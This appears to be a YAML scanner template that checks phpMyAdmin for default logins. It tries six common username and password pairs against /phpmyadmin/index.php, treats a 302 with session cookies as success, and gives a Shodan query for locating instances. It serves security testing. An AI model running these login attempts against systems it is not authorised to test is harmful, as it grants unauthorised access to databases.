id: phpmyadmin-default-login

info:
  name: phpMyAdmin - Default Login
  author: Natto97
  severity: high
  verified: false
  description: |
    phpMyAdmin contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
    SHODAN: http.title:phpMyAdmin
  reference:
    - https://www.phpmyadmin.net
  tags: default-login,phpmyadmin
  created: 2023/06/24

rules:
  r1:
    request:
      method: POST
      path: /phpmyadmin/index.php
      headers:
        Cookie: phpMyAdmin={{token2}}; pma_lang=en
      body: |
        set_session={{session}}&pma_username=root&pma_password=root&server=1&route=%2F&token={{token}}
    expression: |
      response.status == 302 &&
      response.raw_header.ibcontains(b'phpMyAdmin=') && 
      response.raw_header.ibcontains(b'pmaUser-1=') 
    stop_if_match: true
  r2:
    request:
      method: POST
      path: /phpmyadmin/index.php
      headers:
        Cookie: phpMyAdmin={{token2}}; pma_lang=en
      body: |
        set_session={{session}}&pma_username=root&pma_password=123456&server=1&route=%2F&token={{token}}
    expression: |
      response.status == 302 &&
      response.raw_header.ibcontains(b'phpMyAdmin=') && 
      response.raw_header.ibcontains(b'pmaUser-1=') 
    stop_if_match: true
  r3:
    request:
      method: POST
      path: /phpmyadmin/index.php
      headers:
        Cookie: phpMyAdmin={{token2}}; pma_lang=en
      body: |
        set_session={{session}}&pma_username=mysql&pma_password=mysql&server=1&route=%2F&token={{token}}
    expression: |
      response.status == 302 &&
      response.raw_header.ibcontains(b'phpMyAdmin=') && 
      response.raw_header.ibcontains(b'pmaUser-1=') 
    stop_if_match: true
  r4:
    request:
      method: POST
      path: /phpmyadmin/index.php
      headers:
        Cookie: phpMyAdmin={{token2}}; pma_lang=en
      body: |
        set_session={{session}}&pma_username=root&pma_password=toor&server=1&route=%2F&token={{token}}
    expression: |
      response.status == 302 &&
      response.raw_header.ibcontains(b'phpMyAdmin=') && 
      response.raw_header.ibcontains(b'pmaUser-1=')
    stop_if_match: true 
  r5:
    request:
      method: POST
      path: /phpmyadmin/index.php
      headers:
        Cookie: phpMyAdmin={{token2}}; pma_lang=en
      body: |
        set_session={{session}}&pma_username=test&pma_password=test&server=1&route=%2F&token={{token}}
    expression: |
      response.status == 302 &&
      response.raw_header.ibcontains(b'phpMyAdmin=') && 
      response.raw_header.ibcontains(b'pmaUser-1=')
    stop_if_match: true
  r6:
    request:
      method: POST
      path: /phpmyadmin/index.php
      headers:
        Cookie: phpMyAdmin={{token2}}; pma_lang=en
      body: |
        set_session={{session}}&pma_username=test&pma_password=123456&server=1&route=%2F&token={{token}}
    expression: |
      response.status == 302 &&
      response.raw_header.ibcontains(b'phpMyAdmin=') && 
      response.raw_header.ibcontains(b'pmaUser-1=') &&
      response.raw_header.bcontains(b'index.php?')
    stop_if_match: true
expression: r1() || r2() || r3() || r4() || r5() || r6()